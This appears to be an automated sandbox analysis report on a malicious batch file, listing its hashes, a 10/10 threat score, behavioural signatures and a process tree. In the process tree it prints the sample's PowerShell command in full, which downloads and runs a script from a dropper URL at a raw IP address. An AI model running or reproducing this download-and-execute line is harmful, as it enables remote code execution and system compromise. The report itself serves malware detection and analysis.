Analysis
-
max time kernel
132s -
max time network
151s -
platform
windows7_x64 -
resource
win7 -
submitted
29-08-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
9e35cd287a986dd3eab0fd5413dbbfb3.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
9e35cd287a986dd3eab0fd5413dbbfb3.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
9e35cd287a986dd3eab0fd5413dbbfb3.bat
-
Size
215B
-
MD5
d14242bd9a927a641dc49bf913b5b570
-
SHA1
b031b26dd6d89c5672b9cb2f7fe66d650222a687
-
SHA256
755c35484b2236919e799e05687ca2aff151593f39c9deee51c33f6f33c97c7a
-
SHA512
ff13f23ffa4f9e0e568b9eb7aacfe9340d72e46dac773d51356b26b5323102c8d016f4c87ff6cb2d3d886961dd335382f37d88f27b6fac7264ae562079780ab0
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/9e35cd287a986dd3eab0fd5413dbbfb3
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1916 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1916 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1916 powershell.exe 1916 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1916 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1516 wrote to memory of 1916 1516 cmd.exe powershell.exe PID 1516 wrote to memory of 1916 1516 cmd.exe powershell.exe PID 1516 wrote to memory of 1916 1516 cmd.exe powershell.exe PID 1516 wrote to memory of 1916 1516 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\9e35cd287a986dd3eab0fd5413dbbfb3.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9e35cd287a986dd3eab0fd5413dbbfb3');Invoke-GBFBFRLC;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916